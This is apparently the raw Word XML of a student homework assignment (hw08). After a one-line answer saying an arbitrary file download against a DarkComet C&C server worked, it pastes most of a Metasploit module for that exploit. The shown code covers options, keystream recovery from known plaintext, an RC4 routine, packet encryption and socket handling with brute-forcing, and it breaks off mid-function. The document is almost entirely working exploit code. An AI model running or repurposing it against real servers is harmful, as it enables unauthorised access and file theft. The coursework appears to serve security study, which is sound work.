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4D1D5" w14:textId="77777777" w:rsidR="004732A4" w:rsidRDefault="004732A4">
      <w:r>
        <w:t>Zachary Nandapurkar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2212C45A" w14:textId="77777777" w:rsidR="004732A4" w:rsidRDefault="004732A4"/>
    <w:p w14:paraId="450380B8" w14:textId="77777777" w:rsidR="00B942AE" w:rsidRDefault="004908DE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hw08</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="67783496" w14:textId="77777777" w:rsidR="00297348" w:rsidRDefault="00297348"/>
    <w:p w14:paraId="09864F1D" w14:textId="77777777" w:rsidR="00297348" w:rsidRDefault="00297348"/>
    <w:p w14:paraId="35E87F37" w14:textId="318F91CF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>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00297348">
        <w:t xml:space="preserve">What worked was </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an arbitrary file download from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DarkCometServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33652D6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666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># This module requires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Metasploit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: http://metasploit.com/download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8BA51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666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Current source: https://github.com/rapid7/metasploit-framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4749CAB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666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F3648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3864DE9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require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'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msf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/core'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC4CC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22D9524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class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MetasploitModule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&lt;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Msf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::Auxiliary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0636DA5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include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Msf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::Exploit::Remote::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Tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0163264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include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Msf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::Auxiliary::Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C14AF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39669EC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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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initialize(info = {})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E63FEA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super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update_info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(info,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2EC50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'Name'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           </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=&gt; '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DarkComet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Server Remote File Download Exploit',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79489EC3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'Description'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    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=&gt; %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q{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="71FF922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This module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exploits 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an arbitrary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file download vulnerability in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the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DarkComet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C&amp;C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server versions 3.2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and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up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7496D0F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The exploit does not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need to know the password chosen for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the bot/server communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DC4643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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158055C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'License'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        </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=&gt; MSF_LICENSE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77677A2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'Author'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         </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C6E3B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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041BD04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'Shawn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Denbow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&amp; Jesse Hertz', # Vulnerability Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1329D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'Jos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Wetzels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'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#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Metasploit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module, added support for versions &lt; 5.1, removed need to know password via cryptographic attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C38C6F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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7936C65A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'References'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     </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456460D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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E49CA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[ 'URL'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, 'https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf'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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B59BBFA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[ 'URL'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, 'http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware'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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8D70D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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192DB34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'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DisclosureDate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'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=&gt; 'Oct 08 2012',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094485B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'Platform'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       </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=&gt; 'win'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA70C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r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055678F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616A4A7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register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_options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</w:p>
    <w:p w14:paraId="45B737F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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EB6AF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Opt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::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RPORT(1604),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0273EE03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Opt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::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RHOST('0.0.0.0'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347E9FD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78C7B2A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OptString.new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'LHOST', [true, 'This is our IP (as it appears to the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DarkComet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C2 server)', '0.0.0.0']),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201DD1EA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OptString.new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'KEY', [false, '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DarkComet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RC4 key (include DC prefix with key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eg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. #KCMDDC51#-890password)', '']),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330AD3A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lastRenderedPageBreak/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OptBool.new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'NEWVERSION', [false, 'Set to true if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DarkComet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version &gt;= 5.1, set to false if version &lt; 5.1', true]),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416678B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OptString.new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'TARGETFILE', [false, 'Target file to download (assumes password is set)', '']),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1333116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OptBool.new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'STORE_LOOT', [false, 'Store file in loot (will simply output file to console if set to false).', true]),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292E6F7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OptInt.new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'BRUTETIMEOUT', [false, 'Timeout (in seconds) for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bruteforce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attempts', 1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7577B93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0D08822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], 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self.class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1A7563F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2487C54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07A72B0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# Functions for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XORing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two strings, deriving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using known plaintext and applying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to produce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ciphertext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3329776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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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xor_strings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(s1, s2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D7043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s1.unpack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('C*').zip(s2.unpack('C*')).map { |a, b| a ^ b }.pack('C*')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCA4CC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2AEF9BF3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453E7B3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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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get_keystream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ciphertext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known_plaintext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0909C0D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c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[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ciphertext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].pack('H*')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5637424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known_plaintext.length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&gt;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c.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20F79A8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xor_strings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(c,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known_plaintext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[0,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c.length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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF1D7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elsif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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c.length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&gt;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known_plaintext.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="514AD09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xor_strings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(c[0,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known_plaintext.length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],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known_plaintext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3E3254E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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2BF0066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xor_strings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(c,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known_plaintext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323240C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4CEC2EA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1BC7332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44035C7A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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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use_keystream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(plaintext,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4FFF9C5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keystream.length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&gt;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plaintext.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C1CD42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xor_strings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(plaintext,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[0,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plaintext.length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]).unpack('H*')[0].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upcase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19029D6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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="145D40BA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xor_strings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(plaintext,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).unpack('H*')[0].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upcase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5888DDE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15B6124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04E8177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56D8283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# Use RubyRC4 functionality (slightly modified from Max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Prokopiev's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implementation https://github.com/maxprokopiev/ruby-rc4/blob/master/lib/rc4.rb)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C6C0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# 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since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OpenSSL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requires at least 128-bit keys for RC4 while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DarkComet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supports any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keylength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F180C8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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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rc4_initialize(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A63AD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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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q1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= 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2B233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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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q2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= 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF3C7A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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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key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= []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F527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key.each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_byte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{ |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elem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| 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@key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&lt;&lt;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elem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} while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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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key</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.size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&lt; 256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244BA8A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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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key</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.slice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!(256..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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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key</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.size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- 1) if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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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key</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.size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&gt;= 256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0591C73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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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s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= (0..255)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.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to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_a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44954E5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j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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEA6D7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0.upto(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255) do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|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i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|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72773C1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j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(j + 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@s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[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i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] + 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@key</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[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i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]) % 256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6349E6F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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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s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[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i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], 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@s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[j] = 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@s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[j], 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@s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[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i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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252FA2F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2F8BF83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27BEDE1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605B702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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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rc4_keystream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEA407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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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q1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= (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@q1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+ 1) % 256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB6F25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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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q2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= (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@q2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+ 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@s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[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@q1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]) % 256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647BAB6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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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s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[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@q1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], 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@s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[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@q2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] = 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@s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[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@q2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], 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@s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[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@q1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776C5AD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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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s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[(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@s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[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@q1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] + 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@s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@q2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]) % 256]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E71AE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46FF7CA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525E457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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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rc4_process(text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B0F6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text.each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_byte.map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{ |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i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| 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i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^ rc4_keystream).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chr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}.join</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AA352A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24C64AD3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66314DD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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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dc_encryptpacket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(plaintext, key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C839B4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rc4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_initialize(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE9B84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rc4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_process(plaintext).unpack('H*')[0].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upcase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="344F7DC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6899B43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6BA3187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r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Try to execute the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE647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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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try_exploit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exploit_string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bruting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569053B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connect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="79E949E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idtype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_msg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sock.get_once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(12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C537B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79F7AA8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idtype_msg.length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!= 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5582E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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="448B1EE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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282D2EA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68629E7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2A6736F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['KEY'] != ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B490D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exploit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_msg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dc_encryptpacket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exploit_string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['KEY'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E25BCF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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="78CFD57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# If we don't have a key we need enough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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="583CAF0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keystream.nil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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B13DBB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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="33DFCC9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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB8E55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6F44348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26A099D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keystream.length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&lt;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exploit_string.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A3A320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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="259F2D5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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B059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643291C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030E646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exploit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_msg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use_keystream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exploit_string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5A2F256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5DBAB3AA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5E8B6A0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sock.put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exploit_msg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256F969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44F1D97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bruting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D31125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begin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2E9A229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ack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_msg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sock.timed_read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(3,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['BRUTETIMEOUT'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2F076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rescue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Timeout::Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293AD10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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5070F91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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1911C10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5925F35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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1FF44DD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ack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_msg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sock.get_once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(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5BA5D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28F54C4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657BCAF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ack_msg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!= "\x41\x00\x43"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5925F55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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2040F5E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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772556D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r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Different protocol structure for versions &gt;= 5.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E82108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elsif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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['NEWVERSION'] == true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC03C4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bruting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FD5E6D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begin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4C054E33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filelen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sock.timed_read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(10,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['BRUTETIMEOUT']).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to_i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0295C5A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rescue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Timeout::Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CD852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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="557A9E1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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1080B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0026156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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="50105AC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filelen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sock.get_once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(10).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to_i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E78356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04A58AD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filelen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== 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCCD69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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="165223D3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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6835008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5461778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3A33835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['KEY'] != ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654329E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a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_msg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dc_encryptpacket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('A',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['KEY'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAC4A3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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="58A7965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a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_msg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use_keystream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('A',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303E6AB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65906DF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70D71F6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sock.put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a_msg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07DD871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589560B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bruting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75AD208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begin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0DC4D9A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filedata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sock.timed_read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filelen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['BRUTETIMEOUT'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DE4E4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rescue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Timeout::Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126D001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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7AAA0C9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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B29FBA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27A6818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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="39C3110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filedata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sock.get_once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filelen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0B70E0E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046FFF7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57A75483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filedata.length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!=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filelen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="496203D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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="503A890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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A6B7CA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46E5A4B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72ECBC5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sock.put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a_msg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7F02813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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E230D2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filedata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41BBFDE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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6408B9B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filedata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''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC8CAA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5B12BB6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bruting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78AC901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begin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0F1FF61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msg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sock.timed_read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(1024,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['BRUTETIMEOUT'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58303AB3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rescue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Timeout::Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D48D24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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7DB79AD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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BB70D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3CE58A7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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4CFD588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msg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sock.get_once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(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E39614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6A5673E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11AA4AB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while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(!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msg.nil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?) &amp;&amp; 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msg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!= '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D009BA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filedata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+=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msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B61363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bruting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B695A7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begin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23C1089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msg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sock.timed_read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(1024,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['BRUTETIMEOUT'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F74200A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rescue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Timeout::Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FDF18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break</w:t>
      </w:r>
